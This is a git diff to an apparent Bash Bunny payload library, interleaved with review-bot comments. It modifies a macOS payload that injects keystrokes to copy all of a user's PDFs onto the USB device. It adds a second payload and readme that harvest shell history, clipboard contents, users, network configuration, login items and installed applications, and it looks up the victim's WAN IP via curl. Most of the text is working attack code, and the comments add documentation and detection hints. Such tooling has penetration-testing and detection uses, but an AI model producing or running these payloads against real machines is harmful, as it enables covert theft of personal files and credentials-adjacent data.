diff --git a/payloads/library/exfiltration/MacPDFExfil/payload.txt b/payloads/library/exfiltration/MacPDFExfil/payload.txt index 0c363a27..d74275db 100644 --- a/payloads/library/exfiltration/MacPDFExfil/payload.txt +++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt @@ -1,4 +1,4 @@ -#!/bin/bash +#!/bin/bash # # Title: MacPDFExfil # Author: k1ul3ss @@ -14,13 +14,15 @@ ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E dev_name="BashBunny" # loot directory -lootdir="/Volumes/$dev_name/loot/" +lootdir="/Volumes/$dev_name/loot/MacPDFExfil/" QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 +QUACK STRING mkdir -p $lootdir +QUACK ENTER # Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage. QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal QUACK ENTER diff --git a/payloads/library/recon/MacProfiler/payload.txt b/payloads/library/recon/MacProfiler/payload.txt new file mode 100755 index 00000000..8727a39d --- /dev/null +++ b/payloads/library/recon/MacProfiler/payload.txt 
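Review bot: The added `QUACK STRING mkdir -p $lootdir` / `QUACK ENTER` pair in the second MacPDFExfil hunk has no comment, while the `find` step directly below it does; a line such as `# Create the per-payload loot directory on the mounted storage volume.` above it would keep the script self-describing. The header block (outside this hunk apart from its first lines) also does not record where output lands, so the new path is only discoverable by reading the `lootdir=` assignment. For readers using this file as a detection reference, the on-disk indicator moves from `/Volumes/BashBunny/loot/` to `/Volumes/BashBunny/loot/MacPDFExfil/`, so a rule keyed on the old directory should match the prefix rather than the exact path.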
@@ -0,0 +1,52 @@
+#!/bin/bash
+#
+# Title: MacProfiler
+# Author: jdetmold
+# Version: 1.0
+#
+# Creates a basic system profile for a mac computer
+# Saves all data to loot/MacProfiler/{system name}/item.txt
+#
+# Saves the following data to individule files:
+#
+#Terminal history.
+#Current clipboard contents.
+#List of users on the system.
+#ifconfig data.
+#Systems WAN IP.
+#All login items set to start up with the system.
+#List of installed Applications from /Applications.
+#
+#
+# Blue - Running
+# Green - Finished
+#
+
+LED B
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+
+lootdir=/Volumes/BashBunny/loot/MacProfiler/$\(hostname\)
+
+# Start Terminal
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2500
+
+# Save data
+QUACK STRING mkdir -p $lootdir\; history \> $lootdir/history.txt\; osascript -e \"the clipboard\" \> $lootdir/clipboard.txt\; dscl . list /Users \| grep -v '_' \> $lootdir/users.txt\; ifconfig \> $lootdir/ifconfig.txt\; curl ipecho.net/plain \> $lootdir/ExternalIP.txt\; osascript -e \'tell application \"System Events\" to get the name of every login item\' \>$lootdir/LoginItems.txt\; ls /Applications/ \> $lootdir/Applications.txt\;
+QUACK ENTER
+QUACK DELAY 1000
+
+# Eject
+QUACK STRING diskutil eject /Volumes/BashBunny/;
+QUACK ENTER
+QUACK STRING killall Terminal
+QUACK ENTER
+
+# Sync filesystem
+sync
+
+# Green LED for finished
+LED G
diff --git a/payloads/library/recon/MacProfiler/readme.md b/payloads/library/recon/MacProfiler/readme.md
new file mode 100755
index 00000000..5962f903
--- /dev/null
+++ b/payloads/library/recon/MacProfiler/readme.md
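Review bot: The header lists what is collected but never says that the payload contacts a third party: `curl ipecho.net/plain` on the `# Save data` line is given no scheme, which curl treats as plain HTTP, so the lookup is visible on the network and its response is unauthenticated. I would add a header line such as `# Requires outbound HTTP from the target; queries ipecho.net for the WAN IP.` and carry the same statement into the readme, whose Configuration section currently says "None needed". The header also says output goes to `item.txt`, while the command writes `history.txt`, `clipboard.txt`, `users.txt`, `ifconfig.txt`, `ExternalIP.txt`, `LoginItems.txt` and `Applications.txt`; listing the real names makes the file usable as a reference. For detection work, the sequence this line documents is a Terminal session running `osascript`, `dscl`, `ifconfig` and `curl` from one command line, with output redirected under `/Volumes/BashBunny/loot/MacProfiler/`.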
@@ -0,0 +1,30 @@
+# MacProfiler
+* Author: jdetmold
+* Version: Version 1.0
+* Target: Mac
+
+## Description
+
+Uses a HID/Storage Attack to create a system profile including the following information:
+Terminal history.
+Current clipboard contents.
+List of users on the system.
+ifconfig data.
+Systems WAN IP.
+All login items set to start up with the system.
+List of installed Applications from /Applications.
+
+## Configuration
+
+None needed.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Blue | Running |
+| Green | Finished |
+
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40829-payload-macprofiler/ "Hak5 Forum Thread")